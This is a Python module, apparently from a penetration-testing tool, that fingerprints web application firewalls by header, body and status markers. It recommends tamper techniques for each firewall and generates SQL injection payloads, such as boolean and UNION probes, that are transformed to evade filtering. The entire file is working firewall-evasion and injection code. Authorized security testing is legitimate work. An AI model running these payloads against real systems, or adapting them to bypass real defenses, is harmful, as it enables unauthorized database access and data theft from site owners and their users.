from __future__ import annotations

import re
import urllib.parse
from dataclasses import dataclass, field

from .models import PayloadStrategy, SQLBypassCandidate, TamperRecommendation, WAFProfile


@dataclass(frozen=True, slots=True)
class WAFSignatureRule:
    waf_type: str
    vendor: str
    header_markers: tuple[str, ...] = ()
    body_markers: tuple[str, ...] = ()
    status_codes: tuple[int, ...] = ()
    recommendations: tuple[tuple[str, str, str], ...] = ()
    recommendation_basis: str = ""


WAF_SIGNATURE_CATALOG: tuple[WAFSignatureRule, ...] = (
    WAFSignatureRule(
        waf_type="modsecurity",
        vendor="Trustwave",
        header_markers=("mod_security", "noyb"),
        body_markers=(
            "this error was generated by mod_security",
            "one or more things in your request were suspicious",
            "rules of the mod_security module",
            "not acceptable",
        ),
        status_codes=(403, 406),
        recommendations=(
            ("space2comment", "Replace spaces with comments to split simple keyword rules.", ""),
            ("between", "Rewrite boolean equality into BETWEEN variants.", ""),
            ("randomcase", "Vary keyword casing to dodge exact-match filters.", ""),
            ("modsecurityversioned", "Use MySQL versioned comment wrappers where compatible.", "mysql"),
            ("modsecurityzeroversioned", "Fallback MySQL versioned wrapper variant.", "mysql"),
        ),
        recommendation_basis="Atlas-style ModSecurity header/body markers on blocked responses.",
    ),
    WAFSignatureRule(
        waf_type="cloudflare",
        vendor="Cloudflare",
        header_markers=("cloudflare-nginx", "cf-ray", "_cfduid="),
        body_markers=("cloudflare ray id", "var cloudflare="),
        status_codes=(400, 403, 429),
        recommendations=(
            ("charencode", "Encode special SQL metacharacters before transport.", ""),
            ("charunicodeencode", "Unicode-encode critical characters for stricter filters.", ""),
            ("randomcase", "Mixed casing can reduce simple signature hits.", ""),
            ("space2randomblank", "Use alternate blank characters in place of normal spaces.", ""),
            ("between", "Switch equality checks to BETWEEN family expressions.", ""),
        ),
        recommendation_basis="Atlas-style Cloudflare header and blocked-page markers.",
    ),
    WAFSignatureRule(
        waf_type="imperva",
        vendor="Imperva/Incapsula",
        header_markers=("incap_ses", "visid_incap", "x-iinfo"),
        body_markers=("incapsula incident id", "incapsula"),
        status_codes=(403, 406),
        recommendations=(
            ("base64encode", "Encode payloads when transport-layer signatures are dominant.", ""),
            ("between", "Use operator rewrites to preserve semantics.", ""),
            ("randomcase", "Case variation can bypass brittle filters.", ""),
            ("securesphere", "Atlas-style Imperva-oriented script suggestion.", ""),
            ("space2comment", "Break keyword signatures with comments.", ""),
        ),
        recommendation_basis="Atlas-style Incapsula cookie/header/body signatures.",
    ),
    WAFSignatureRule(
        waf_type="akamai",
        vendor="Akamai Kona",
        header_markers=("akamaighost", "x-akamai"),
        body_markers=("reference #",),
        status_codes=(400, 403, 501),
        recommendations=(
            ("charencode", "Encode special characters to reduce direct signature matching.", ""),
            ("charunicodeencode", "Unicode encoding is often useful against strict edge filters.", ""),
            ("randomcase", "Mixed-case keywords can avoid exact signatures.", ""),
            ("space2comment", "Inline comments reduce plain-token visibility.", ""),
            ("between", "Use BETWEEN family rewrites for boolean probes.", ""),
        ),
        recommendation_basis="Atlas-style AkamaiGHost and reference-page indicators.",
    ),
    WAFSignatureRule(
        waf_type="requestvalidationmode",
        vendor="Microsoft",
        body_markers=(
            "asp.net has detected data in the request that is potentially dangerous",
            "request validation has detected a potentially dangerous client input value",
            "httprequestvalidationexception",
        ),
        status_codes=(500,),
        recommendations=(
            ("charencode", "Encode dangerous metacharacters before ASP.NET request validation.", ""),
            ("charunicodeencode", "Unicode encoding can reduce direct validation hits.", ""),
            ("randomcase", "Mixed casing helps only when downstream signatures are case-sensitive.", ""),
        ),
        recommendation_basis="Atlas-style ASP.NET request validation exception text.",
    ),
    WAFSignatureRule(
        waf_type="wordfence",
        vendor="Feedjit",
        body_markers=("this response was generated by wordfence", "your access to this site has been limited"),
        status_codes=(403,),
        recommendations=(
            ("space2comment", "Break plain SQL token sequences inside Wordfence filters.", ""),
            ("randomcase", "Keyword casing variation may help with simple matches.", ""),
            ("between", "Operator family rewrite can avoid direct equality patterns.", ""),
        ),
        recommendation_basis="Atlas-style Wordfence body markers.",
    ),
    WAFSignatureRule(
        waf_type="safedog",
        vendor="Safedog",
        header_markers=("waf/2.0", "safedog"),
        status_codes=(403,),
        recommendations=(
            ("space2comment", "Split token sequences with comments.", ""),
            ("randomcase", "Case variation may reduce static signature matches.", ""),
            ("space2plus", "Change spacing layout in transport.", ""),
        ),
        recommendation_basis="Atlas-style Safedog header markers.",
    ),
    WAFSignatureRule(
        waf_type="varnish",
        vendor="OWASP/Varnish",
        header_markers=("x-varnish", "varnish"),
        body_markers=("request rejected by xvarnish-waf", "xid:"),
        status_codes=(400, 404),
        recommendations=(
            ("varnish", "Atlas-style Varnish-specific tamper suggestion.", ""),
            ("space2comment", "Reduce direct keyword visibility.", ""),
            ("between", "Operator rewrite may avoid inline signatures.", ""),
        ),
        recommendation_basis="Atlas-style x-varnish and xVarnish rejection markers.",
    ),
)

GENERIC_RECOMMENDATIONS: tuple[tuple[str, str, str], ...] = (
    ("between", "Generic boolean rewrite with low side effects.", ""),
    ("charencode", "Generic metacharacter encoding recommendation.", ""),
    ("randomcase", "Generic exact-signature avoidance through mixed casing.", ""),
    ("space2comment", "Generic keyword splitting with comments.", ""),
    ("space2plus", "Generic whitespace transport mutation.", ""),
)


class WAFDetector:
    def __init__(self) -> None:
        self.rules = WAF_SIGNATURE_CATALOG
        self.blocking_patterns: list[tuple[re.Pattern[str], str]] = [
            (re.compile(r"403\s+forbidden", re.IGNORECASE), "403 Forbidden"),
            (re.compile(r"access\s+denied", re.IGNORECASE), "Access Denied"),
            (re.compile(r"request\s+blocked", re.IGNORECASE), "Request Blocked"),
            (re.compile(r"suspicious\s+activity", re.IGNORECASE), "Suspicious Activity"),
            (re.compile(r"security\s+violation", re.IGNORECASE), "Security Violation"),
            (re.compile(r"malicious\s+request", re.IGNORECASE), "Malicious Request"),
            (re.compile(r"sql\s+injection", re.IGNORECASE), "SQL Injection Detection"),
            (re.compile(r"attack\s+detected", re.IGNORECASE), "Attack Detected"),
        ]

    def detect(self, headers: dict[str, str] | None, body: str, *, status_code: int = 0) -> WAFProfile:
        headers = headers or {}
        normalized_headers = {str(key).lower(): str(value or "").lower() for key, value in headers.items()}
        normalized_body = (body or "").lower()

        best_rule: WAFSignatureRule | None = None
        best_hits: list[str] = []
        best_score = 0.0
        matched_by: list[str] = []

        for rule in self.rules:
            hits: list[str] = []
            score = 0.0
            marker_hit = False
            for marker in rule.header_markers:
                if any(marker.lower() in f"{key}:{value}" for key, value in normalized_headers.items()):
                    hits.append(marker)
                    score += 1.0
                    marker_hit = True
            for marker in rule.body_markers:
                if marker.lower() in normalized_body:
                    hits.append(marker)
                    score += 1.0
                    marker_hit = True
            if status_code and status_code in rule.status_codes:
                hits.append(f"status:{status_code}")
                score += 0.5
            if not marker_hit:
                continue
            if score > best_score:
                best_score = score
                best_rule = rule
                best_hits = hits
                matched_by = self._matched_by(rule, normalized_headers, normalized_body, status_code)

        blocked = self.blocked_indicators(body)
        if best_rule:
            max_score = len(best_rule.header_markers) + len(best_rule.body_markers) + (0.5 if best_rule.status_codes else 0.0)
            confidence = min(best_score / max(max_score, 1.0), 1.0)
            return WAFProfile(
                waf_type=best_rule.waf_type,
                confidence=round(confidence, 3),
                detected=True,
                vendor=best_rule.vendor,
                matched_by=matched_by,
                recommendation_basis=best_rule.recommendation_basis,
                signatures=best_hits,
                blocked_indicators=blocked,
            )

        confidence = 0.35 if blocked else 0.1
        return WAFProfile(
            waf_type="generic",
            confidence=confidence,
            detected=bool(blocked),
            vendor="generic",
            matched_by=["blocked_response"] if blocked else [],
            recommendation_basis="Generic fallback because blocking indicators were observed without a precise Atlas-style fingerprint."
            if blocked
            else "",
            signatures=[],
            blocked_indicators=blocked,
        )

    def blocked_indicators(self, body: str) -> list[str]:
        return [label for pattern, label in self.blocking_patterns if pattern.search(body or "")]

    def _matched_by(self, rule: WAFSignatureRule, headers: dict[str, str], body: str, status_code: int) -> list[str]:
        matched: list[str] = []
        for marker in rule.header_markers:
            if any(marker.lower() in f"{key}:{value}" for key, value in headers.items()):
                matched.append(f"header:{marker}")
        for marker in rule.body_markers:
            if marker.lower() in body:
                matched.append(f"body:{marker}")
        if status_code and status_code in rule.status_codes:
            matched.append(f"status:{status_code}")
        return matched


class PayloadTransformer:
    def build_strategies(self, candidate: SQLBypassCandidate, waf_profile: WAFProfile, *, limit: int = 8) -> list[PayloadStrategy]:
        base_true = self._base_payload(candidate, truth=True)
        base_false = self._base_payload(candidate, truth=False)
        strategies = [
            self._strategy("case_variation", base_true, base_false, self._case_variation, "keyword-case", "mixed SQL keyword casing", "randomcase"),
            self._strategy("comment_obfuscated", base_true, base_false, self._comment_obfuscation, "comment", "inline SQL comments between keywords", "space2comment"),
            self._strategy("space_comment", base_true, base_false, lambda value: self._replace_spaces(value, "/**/"), "whitespace", "spaces replaced with SQL comments", "space2comment"),
            self._strategy("space_plus", base_true, base_false, lambda value: self._replace_spaces(value, "+"), "whitespace", "spaces replaced with plus separators", "space2plus"),
            self._strategy("tab_space", base_true, base_false, lambda value: self._replace_spaces(value, "\t"), "whitespace", "spaces replaced with tab characters", "space2randomblank"),
            self._strategy("between_variant", base_true, base_false, self._between_variant, "operator", "truth condition expressed with BETWEEN", "between"),
            self._strategy("like_variant", base_true, base_false, self._like_variant, "operator", "equality expressed with LIKE", "equaltolike"),
            self._strategy("symbolic_logical", base_true, base_false, self._symbolic_logical, "operator", "AND keyword replaced with symbolic logical operator", "symboliclogical"),
            self._strategy("mysql_version_comment", base_true, base_false, self._mysql_version_comment, "comment", "MySQL version comment keyword wrapper", "versionedkeywords"),
            self._strategy("url_encoded_quotes", base_true, base_false, self._url_encode_specials, "encoding", "URL encoding for SQL metacharacters", "charencode"),
        ]
        preferred = self._preferred_strategy_names(waf_profile.waf_type)
        ordered = sorted(strategies, key=lambda item: (preferred.index(item.name) if item.name in preferred else 99, item.name))
        unique: list[PayloadStrategy] = []
        seen_payloads: set[str] = set()
        for strategy in ordered:
            if strategy.payload in seen_payloads:
                continue
            unique.append(strategy)
            seen_payloads.add(strategy.payload)
            if len(unique) >= limit:
                break
        return unique

    def _strategy(self, name: str, true_payload: str, false_payload: str, transform, family: str, note: str, tamper_hint: str) -> PayloadStrategy:
        transformed_true = transform(true_payload)
        transformed_false = transform(false_payload)
        return PayloadStrategy(
            name=name,
            payload=transformed_true,
            true_payload=transformed_true,
            false_payload=transformed_false,
            family=family,
            note=note,
            tamper_hint=tamper_hint,
        )

    def _base_payload(self, candidate: SQLBypassCandidate, *, truth: bool) -> str:
        comparison = "'1'='1" if truth else "'1'='2"
        numeric_comparison = "1=1" if truth else "1=2"
        if any(name in candidate.confirmed_strategies for name in ("between_variant", "like_variant", "paren_wrapped")):
            return f"1' and {comparison}"
        if any(name in candidate.confirmed_strategies for name in ("union_basic", "union")):
            return "1' union select 1,2 -- "
        if candidate.method == "POST":
            return f"1' or {comparison}"
        if candidate.parameter.lower() in {"id", "uid", "user_id"}:
            return f"1 and {numeric_comparison}"
        return f"1' and {comparison}"

    def _case_variation(self, payload: str) -> str:
        replacements = {"and": "AnD", "or": "oR", "union": "UnIoN", "select": "SeLeCt", "like": "LiKe"}
        result = payload
        for old, new in replacements.items():
            result = re.sub(rf"\b{old}\b", new, result, flags=re.IGNORECASE)
        return result

    def _comment_obfuscation(self, payload: str) -> str:
        result = re.sub(r"(?i)\band\b", "a/**/nd", payload)
        result = re.sub(r"(?i)\bor\b", "o/**/r", result)
        result = re.sub(r"(?i)\bunion\b", "un/**/ion", result)
        result = re.sub(r"(?i)\bselect\b", "sel/**/ect", result)
        return result

    def _replace_spaces(self, payload: str, replacement: str) -> str:
        return re.sub(r"\s+", replacement, payload.strip())

    def _between_variant(self, payload: str) -> str:
        if "'1'='1" in payload:
            return payload.replace("'1'='1", "'1' between '0' and '2'")
        return payload.replace("1=1", "1 between 0 and 2")

    def _like_variant(self, payload: str) -> str:
        if "'1'='1" in payload:
            return payload.replace("'1'='1", "'1' like '1'")
        return payload.replace("1=1", "1 like 1")

    def _symbolic_logical(self, payload: str) -> str:
        return re.sub(r"(?i)\band\b", "&&", payload)

    def _mysql_version_comment(self, payload: str) -> str:
        return re.sub(r"(?i)\band\b", "/*!50000AnD*/", payload)

    def _url_encode_specials(self, payload: str) -> str:
        return "".join(urllib.parse.quote(char) if char in "'\"()= " else char for char in payload)

    def _preferred_strategy_names(self, waf_type: str) -> list[str]:
        return {
            "cloudflare": ["url_encoded_quotes", "tab_space", "case_variation", "between_variant", "space_comment"],
            "modsecurity": ["comment_obfuscated", "space_comment", "mysql_version_comment", "case_variation", "between_variant"],
            "imperva": ["comment_obfuscated", "case_variation", "between_variant", "space_plus"],
            "akamai": ["url_encoded_quotes", "case_variation", "space_comment", "between_variant"],
            "requestvalidationmode": ["url_encoded_quotes", "case_variation", "space_plus"],
            "generic": ["space_comment", "case_variation", "between_variant", "like_variant", "space_plus"],
        }.get(waf_type, ["space_comment", "case_variation", "between_variant", "like_variant"])


class EvasionEngine:
    def __init__(self) -> None:
        self.detector = WAFDetector()
        self.transformer = PayloadTransformer()

    def analyze_response(self, headers: dict[str, str] | None, body: str, *, status_code: int = 0) -> WAFProfile:
        return self.detector.detect(headers, body, status_code=status_code)

    def generate_strategies(self, candidate: SQLBypassCandidate, waf_profile: WAFProfile, *, limit: int = 8) -> list[PayloadStrategy]:
        return self.transformer.build_strategies(candidate, waf_profile, limit=limit)

    def tamper_recommendations(self, waf_profile: WAFProfile, *, dbms_hint: str = "") -> list[TamperRecommendation]:
        dbms_hint = (dbms_hint or "").strip().lower()
        rule = next((item for item in WAF_SIGNATURE_CATALOG if item.waf_type == waf_profile.waf_type), None)
        catalog = rule.recommendations if rule else GENERIC_RECOMMENDATIONS
        source = "atlas_signature" if rule else "generic_fallback"
        results: list[TamperRecommendation] = []
        rank = 1
        for name, reason, dbms_scope in catalog:
            if dbms_scope and dbms_hint and dbms_scope != dbms_hint:
                continue
            if dbms_scope and not dbms_hint:
                continue
            results.append(
                TamperRecommendation(
                    name=name,
                    source=source,
                    reason=reason,
                    dbms_scope=dbms_scope,
                    rank=rank,
                )
            )
            rank += 1
        if not results:
            for name, reason, dbms_scope in GENERIC_RECOMMENDATIONS:
                results.append(
                    TamperRecommendation(
                        name=name,
                        source="generic_fallback",
                        reason=reason,
                        dbms_scope=dbms_scope,
                        rank=len(results) + 1,
                    )
                )
        return results
